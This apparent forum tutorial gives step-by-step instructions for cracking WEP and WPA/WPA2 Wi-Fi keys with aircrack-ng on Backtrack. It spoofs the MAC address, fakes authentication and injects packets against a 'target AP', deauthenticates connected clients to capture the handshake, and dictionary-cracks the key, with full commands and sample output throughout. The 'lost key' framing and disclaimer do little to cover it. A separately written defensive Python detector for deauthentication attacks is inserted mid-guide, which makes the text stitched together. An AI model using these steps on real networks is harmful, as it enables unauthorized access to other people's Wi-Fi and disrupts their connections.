Okay guys, thanks to my friends at xSellize, I'll show you how to retrieve a lost WEP or WPA key.
**I AM NOT SAYING THAT YOU SHOULD USE THIS FOR HACKING OTHER PEOPLE'S NETWORKS; WHAT YOU DO WITH THESE INSTRUCTIONS IS UP TO YOU.**
========================
INSTRUCTIONS FOR WEP KEY ONLY:
========================
1) First get Backtrack and burn the iso image onto a CD.
2) Boot your laptop/pc/mac from said CD.
3) Open a terminal window and follow the instructions below...
=============================
WEP cracking with aircrack-ng
=============================
------------------------------------------------------------------------------------------------
(Puts wifi card into monitor mode and changes mac address)
------------------------------------------------------------------------------------------------
airmon-ng stop eth1
ifconfig eth1 down
macchanger --mac 00:11:22:33:44:55 eth1
airmon-ng start eth1
********************************************************************
**eth1 = wifi adapter, check by typing "iwconfig" to see what the adapter is named.
**
**macchanger = changes the mac address of the NIC, makes it easier to remember and input at a later stage.
**
**These commands stop the NIC eth1, if it was active, then take it offline so the mac address can be changed, and then
**restart it in monitor mode.
********************************************************************
------------------------------------------------------------------------------------------------
(Searches and displays all Access Points, then targets specific AP and listens on that channel and saves data to a file)
------------------------------------------------------------------------------------------------
airodump-ng eth1
*choose AP and press ctrl + c*
airodump-ng -c # -w filename --bssid "APbssid" eth1
********************************************************************
**airodump-ng eth1 = Scans all networks using NIC eth1.
**
**ctrl + c = Stops the scan and returns to the input line.
**
**-c = channel the target AP is on; if for example it was on channel 11, the command used would be -c 11
**
**-w = file name to save data to, for example -w testfile would create a file named testfile.
**
**--bssid = the bssid of the target AP, example --bssid f8:ba:4d:18:37
********************************************************************
------------------------------------------------------------------------------------------------
(Fake authentication with target AP)
*new terminal window/tab*
------------------------------------------------------------------------------------------------
aireplay-ng -1 0 -a "APMAC" -h 00:11:22:33:44:55 eth1
********************************************************************
**-1 = type of attack to use; -1 is the fake authentication attack (the 0 after it is its delay parameter).
**
**-a = specifies the target AP's mac address.
**
**-h = Wifi card's mac address, which was changed to 00:11:22:33:44:55 in the previous commands.
********************************************************************
------------------------------------------------------------------------------------------------
(Packet injection attack)
*new terminal/tab*
------------------------------------------------------------------------------------------------
aireplay-ng -3 -b "APMAC" -h 00:11:22:33:44:55 eth1
********************************************************************
**-3 = type of attack; -3 is the packet injection attack.
**
**-b = specifies the target AP's mac address.
**
**-h = Wifi card's mac address, which was changed to 00:11:22:33:44:55 in the previous commands.
********************************************************************
------------------------------------------------------------------------------------------------
(Decrypting the data collected to get the wep key)
*new terminal/tab*
------------------------------------------------------------------------------------------------
aircrack-ng -n 64 --bssid "APMAC" filename-01.cap
********************************************************************
**-n = WEP key length the AP uses (48, 64, 128); for example -n 64 is for 64-bit WEP encryption.
**
**--bssid = mac address of the target AP.
**
**filename-01.cap = the file that the data has been saved to. If you called it something different use that name instead.
**Check the file name: it usually has -01 added to the end and uses the .cap file type.
********************************************************************
------------------------------------------------------------------------------------------------
DONE! =D
HERE IS A LIST OF COMPATIBLE DRIVERS THAT YOU CAN USE:
Best cards to buy/use.
THIS WILL WORK ON WINDOWS/LINUX/MAC. JUST BOOT FROM THE CD.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX
============================
INSTRUCTIONS FOR WPA/WPA2 KEY ONLY:
============================
**NOTE: Before you do anything, read the first few steps of the WEP guide to get an idea of which software to use and how to use it.**
STEP 1: START THE WIRELESS INTERFACE IN MONITOR MODE.
The purpose of this step is to put your card into what is called monitor mode.
Monitor mode is the mode whereby your card can listen to every packet in the air.
Normally your card will only “hear” packets addressed to you.
By hearing every packet, we can later capture the WPA/WPA2 4-way handshake.
As well, it will allow us to optionally deauthenticate a wireless client in a later step.
These steps are mostly specific to the madwifi-ng driver - for other drivers, this procedure varies. (Most commonly, running the command “airmon-ng start ” is used to set up monitor mode.)
First stop ath0 by entering:
    airmon-ng stop ath0
The system responds:
    Interface Chipset Driver
    wifi0 Atheros madwifi-ng
    ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Enter “iwconfig” to ensure there are no other athX interfaces. It should look similar to this:
    lo no wireless extensions.
    eth0 no wireless extensions.
    wifi0 no wireless extensions.
If there are any remaining athX interfaces, then stop each one. When you are finished, run “iwconfig” to ensure there are none left.
Now, enter the following command to start the wireless card on channel 9 in monitor mode:
    airmon-ng start wifi0 9
Note: In this command we use “wifi0” instead of our wireless interface of “ath0”. This is because the madwifi-ng drivers are being used.
The system will respond:
    Interface Chipset Driver
    wifi0 Atheros madwifi-ng
    ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
You will notice that “ath0” is reported above as being put into monitor mode.
To confirm the interface is properly set up, enter “iwconfig”.
The system will respond:
    lo no wireless extensions.
    wifi0 no wireless extensions.
    eth0 no wireless extensions.
    ath0 IEEE 802.11g ESSID:"" Nickname:""
    Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
    Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
    Retry:off RTS thr:off Fragment thr:off
    Encryption key:off
    Power Management:off
    Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0
In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9, and the Access Point field shows the MAC address of your wireless card.
It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.
STEP 2: START AIRODUMP-NG TO COLLECT AUTHENTICATION HANDSHAKE
The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.
Enter:
    airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
Where:
- -c 9 is the channel for the wireless network
- --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
- -w psk is the file name prefix for the file which will contain the IVs.
- ath0 is the interface name.
Important: Do NOT use the ”--ivs” option. You must capture the full packets.
Here is what it looks like if a wireless client is connected to the network:
    CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy
    BSSID STATION PWR Lost Packets Probes
    00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116
In the screen above, notice the “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner.
This means airodump-ng has successfully captured the four-way handshake.
Here it is with no connected wireless clients:
    CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51
    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy
    BSSID STATION PWR Lost Packets Probes
To see if you captured any handshake packets, there are two ways:
- Watch the airodump-ng screen for “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.
- Use Wireshark and apply a filter of “eapol”. This displays only the eapol packets you are interested in, so you can see whether the capture contains 0, 1, 2, 3 or 4 eapol packets.
STEP 3: USE AIREPLAY-NG TO DEAUTHENTICATE THE WIRELESS CLIENT
This step is optional.
You only perform this step if you opted to actively speed up the process.
The other constraint is that there must be a wireless client currently associated with the AP.
If there is no wireless client currently associated with the AP, then move onto the next step and be patient.
Needless to say, if a wireless client shows up later, you can backtrack and perform this step.
This step sends a message to the wireless client saying that it is no longer associated with the AP.
The wireless client will then hopefully reauthenticate with the AP.
The reauthentication is what generates the 4-way authentication handshake we are interested in collecting.
This is what we use to break the WPA/WPA2 pre-shared key.
Based on the output of airodump-ng in the previous step, you determine a client which is currently connected.
You need the MAC address for the following.
Open another console session and enter:
    aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
Where:
- -0 means deauthentication
- 1 is the number of deauths to send (you can send multiple if you wish)
- -a 00:14:6C:7E:40:80 is the MAC address of the access point
- -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
- ath0 is the interface name
Here is what the output looks like:
    11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
With luck this causes the client to reauthenticate and yield the 4-way handshake.
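The two observable artefacts of this step, a burst of deauthentication frames followed by a fresh 4-way handshake (the EAPOL-Key messages Step 2 says to count with a Wireshark “eapol” filter), are exactly what a wireless IDS or an incident responder looks for in a monitor-mode capture. The following is an added example, not code from the original post or from the aircrack-ng project: it parses raw 802.11 frames (no radiotap header), classifies deauthentication frames and EAPOL-Key messages 1 to 4 from their Key Information flags, and raises an alert when a source sends more deauths than a threshold to one station, noting whether a complete handshake for that pair follows. The sample frames at the bottom are constructed for the example and only reuse the AP and client MAC addresses shown in the post; the message-4 rule assumes the WPA2 Secure bit, which WPA1 does not set.

```python
import struct
from collections import defaultdict

# MAC addresses reused from the post's airodump-ng output (sample values)
AP = "00:14:6c:7e:40:80"
STA = "00:0f:b5:fd:fb:c2"

LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")  # LLC/SNAP header, EtherType 0x888E
# EAPOL-Key "Key Information" flag bits (IEEE 802.11 EAPOL-Key frame format)
KEY_INSTALL, KEY_ACK, KEY_MIC, KEY_SECURE = 0x0040, 0x0080, 0x0100, 0x0200


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def handshake_message(key_info):
    """Map Key Information flags to 4-way handshake message number 1-4 (0 = other)."""
    ack, mic = bool(key_info & KEY_ACK), bool(key_info & KEY_MIC)
    if ack and not mic:
        return 1
    if ack and mic and key_info & KEY_INSTALL:
        return 3
    if mic and not ack:
        # WPA2 sets Secure in message 4; WPA1 does not, so a WPA1 message 4
        # would be reported as 2 by this simplified rule (assumption of this example).
        return 4 if key_info & KEY_SECURE else 2
    return 0


def parse_frame(frame):
    """Classify one raw 802.11 frame (no radiotap) as deauth or eapol, else None."""
    if len(frame) < 24:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    to_ds, from_ds = frame[1] & 0x1, (frame[1] >> 1) & 0x1
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if ftype == 0 and subtype == 12 and len(frame) >= 26:  # management: deauthentication
        reason = struct.unpack_from("<H", frame, 24)[0]
        return {"kind": "deauth", "src": mac(a2), "dst": mac(a1), "bssid": mac(a3), "reason": reason}
    if ftype == 2 and subtype in (0, 8):  # data or QoS data (QoS adds a 2-byte control field)
        body = frame[26 if subtype == 8 else 24:]
        if not body.startswith(LLC_SNAP_EAPOL):
            return None
        eapol = body[8:]
        if len(eapol) < 7 or eapol[1] != 3:  # EAPOL packet type 3 = EAPOL-Key
            return None
        key_info = struct.unpack_from(">H", eapol, 5)[0]  # after 4-byte EAPOL hdr + descriptor type
        if to_ds and not from_ds:    # station -> AP: A1=BSSID A2=SA A3=DA
            src, dst = mac(a2), mac(a3)
        elif from_ds and not to_ds:  # AP -> station: A1=DA A2=BSSID A3=SA
            src, dst = mac(a3), mac(a1)
        else:
            return None
        return {"kind": "eapol", "src": src, "dst": dst, "msg": handshake_message(key_info)}
    return None


def analyze(frames, deauth_threshold=3):
    """Count deauths per (src, dst) and handshake messages per (ap, sta); return alerts."""
    deauths, handshakes = defaultdict(int), defaultdict(set)
    for frame in frames:
        p = parse_frame(frame)
        if p is None:
            continue
        if p["kind"] == "deauth":
            deauths[(p["src"], p["dst"])] += 1
        elif p["msg"]:
            ap_to_sta = p["msg"] in (1, 3)
            handshakes[(p["src"], p["dst"]) if ap_to_sta else (p["dst"], p["src"])].add(p["msg"])
    alerts = []
    for (src, dst), n in deauths.items():
        if n >= deauth_threshold:
            text = f"{n} deauthentication frames from {src} to {dst}"
            if {1, 2, 3, 4} <= handshakes.get((src, dst), set()):
                text += " followed by a complete 4-way handshake (deauth-then-reauth pattern)"
            alerts.append(text)
    return {"deauths": dict(deauths), "handshakes": {k: sorted(v) for k, v in handshakes.items()}, "alerts": alerts}


# --- constructed sample frames for this example (not a real capture) -------------------------
def deauth_frame(src, dst, bssid, reason=7):
    hdr = bytes([0xC0, 0x00, 0x3A, 0x01]) + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + b"\x00\x00"
    return hdr + struct.pack("<H", reason)


def eapol_frame(key_info, ap, sta, from_ap):
    a1, a2, a3, fc1 = (sta, ap, ap, 0x02) if from_ap else (ap, sta, ap, 0x01)
    hdr = bytes([0x08, fc1, 0, 0]) + mac_bytes(a1) + mac_bytes(a2) + mac_bytes(a3) + b"\x00\x00"
    key = bytes([2]) + struct.pack(">H", key_info) + bytes(92)  # descriptor type 2, key info, zeroed rest
    return hdr + LLC_SNAP_EAPOL + bytes([2, 3]) + struct.pack(">H", len(key)) + key


SAMPLE_FRAMES = [deauth_frame(AP, STA, AP) for _ in range(4)] + [
    eapol_frame(0x008A, AP, STA, True),   # message 1: ACK
    eapol_frame(0x010A, AP, STA, False),  # message 2: MIC
    eapol_frame(0x13CA, AP, STA, True),   # message 3: ACK|MIC|Install|Secure|Encrypted
    eapol_frame(0x030A, AP, STA, False),  # message 4: MIC|Secure
]

if __name__ == "__main__":
    for line in analyze(SAMPLE_FRAMES)["alerts"]:
        print("ALERT:", line)
```

On a real capture you would feed `analyze()` the 802.11 payloads of each packet after stripping the radiotap header, and tune `deauth_threshold` to the environment; a station that is simply roaming also produces a deauth plus a handshake, so the alert is a signal to investigate rather than proof of an attack. Management Frame Protection (802.11w) is the mitigation that makes forged deauthentication frames ineffective in the first place.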
STEP 4: RUN AIRCRACK-NG TO CRACK THE PRE-SHARED KEY.
The purpose of this step is to actually crack the WPA/WPA2 pre-shared key.
To do this, you need a dictionary of words as input.
Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.
There is a small dictionary that comes with aircrack-ng - “password.lst”.
This file can be found in the “test” directory of the aircrack-ng source code.
The Wiki FAQ has an extensive list of dictionary sources.
You can use John the Ripper (JTR) to generate your own list and pipe them into aircrack-ng.
Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.
Open another console session and enter:
    aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
Where:
- -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
- psk*.cap is the name of the group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.
Here is typical output when there are no handshakes found:
    Opening psk-01.cap
    Opening psk-02.cap
    Opening psk-03.cap
    Opening psk-04.cap
    Read 1827 packets.
    No valid WPA handshakes found.
When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach.
When using the passive approach, you have to wait until a wireless client authenticates to the AP.
Here is typical output when handshakes are found:
    Opening psk-01.cap
    Opening psk-02.cap
    Opening psk-03.cap
    Opening psk-04.cap
    Read 1827 packets.
    # BSSID ESSID Encryption
    1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
    Choosing first network as target.
Now at this point, aircrack-ng will start attempting to crack the pre-shared key.
Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.
Here is what successfully cracking the pre-shared key looks like:
    Aircrack-ng 0.8
    [00:00:00] 2 keys tested (37.20 k/s)
    KEY FOUND! [ 12345678 ]
    Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
    B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
    CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
    FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
    2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
    EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
PLEASE NOTE THAT SOMETIMES THIS WILL NOT WORK THE FIRST TIME; PLAY AROUND WITH IT. IT DOES WORK.
It can sometimes be tricky to capture the four-way handshake. Here are some troubleshooting tips to address this:
- Your monitor card must be in the same mode as both the client and the Access Point.
So, for example, if your card was in “B” mode and the client/AP were using “G” mode, then you would not capture the handshake.
This is especially important for new APs and clients which may be using “turbo” mode and/or other new standards.
Some drivers allow you to specify the mode.
Also, iwconfig has an option “modulation” that can sometimes be used.
Do “man iwconfig” to see the options for “modulation”.
For information, 1, 2, 5.5 and 11Mbit are 'b'; 6, 9, 12, 18, 24, 36, 48 and 54Mbit are 'g'.
- Sometimes you also need to set the monitor-mode card to the same speed, i.e. auto, 1MB, 2MB, 11MB, 54MB, etc.
- Be sure that your capture card is locked to the same channel as the AP. You can do this by specifying ”-c ” when you start airodump-ng.
- Be sure there are no connection managers running on your system. These can change channels and/or change mode without your knowledge.
- Be sure you are physically close enough to receive both access point and wireless client packets. The wireless card's signal strength is typically less than the AP's.
- Conversely, if you are too close then the received packets can be corrupted and discarded. So you cannot be too close either.
- Make sure to use the drivers specified on the wiki. Depending on the driver, some old versions do not capture all packets.
- Ideally, connect and disconnect a wireless client normally to generate the handshake.
- If you use the deauth technique, send the absolute minimum of packets needed to cause the client to reauthenticate.
Normally this is a single deauth packet.
Sending an excessive number of deauth packets may cause the client to fail to reconnect, and thus it will not generate the four-way handshake.
As well, use directed deauths, not broadcast.
To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client.
If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.
- Try stopping the radio on the client station then restarting it.
- Make sure you are not running any other program/process that could interfere, such as connection managers, Kismet, etc.
- Review your captured data using the WPA Packet Capture Explained tutorial to see if you can identify the problem, such as missing AP packets, missing client packets, etc.
THIS IS THE END OF THE GUIDE. MOST OF THE CREDIT GOES TO MY BUDDIES AT XSELLIZE FOR THIS WONDERFULLY EASY-TO-FOLLOW TUTORIAL =].
YOU CAN USE JOHN THE RIPPER (JTR) TO GENERATE YOUR OWN LIST AND PIPE THEM INTO AIRCRACK-NG.
I'M NOT SURE ON HOW TO DO THIS!
John the Ripper password cracker
HOPE YOU ENJOYED IT!
Jambalaya ^_____^








